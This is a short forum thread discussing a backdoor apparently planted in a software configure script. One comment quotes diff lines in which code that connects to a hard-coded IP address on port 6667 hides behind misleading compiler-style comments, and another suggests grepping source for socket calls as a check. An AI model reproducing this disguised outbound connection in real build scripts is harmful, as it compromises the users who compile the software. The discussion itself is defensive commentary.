    Of course, if I had done it, I would have made it more subtle. Perhaps a hard-to-find buffer overflow in CTCP handling, or such...

    (The preceding was a JOKE...)

  • How about a simple "egrep -nr 'socket|connect' *" before running configure and compiling software? If you see any lines in the output and don't understand why they are there you shouldn't run configure or compile the software. IMO, if you don't know why you should check for at least socket you shouldn't compile software at all.

    Granted, exploit could be hidden from such a simple check but it still seems that above would be enough to prevent backdoors.

    • Notice how the code is nicely commented? Makes it look legit:
      +/* We use char because int might match the return type of a gcc2
      + builtin and then its argument prototype would still apply. */
      + sa.sin_port = htons (6667);
      + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
      +/* Override any gcc2 internal prototype to avoid an error. */
      Dammit, so that's why my `egrep -nr 'h4x0r|gr33tz' *` didn't work =D

: is not an identifier

Working...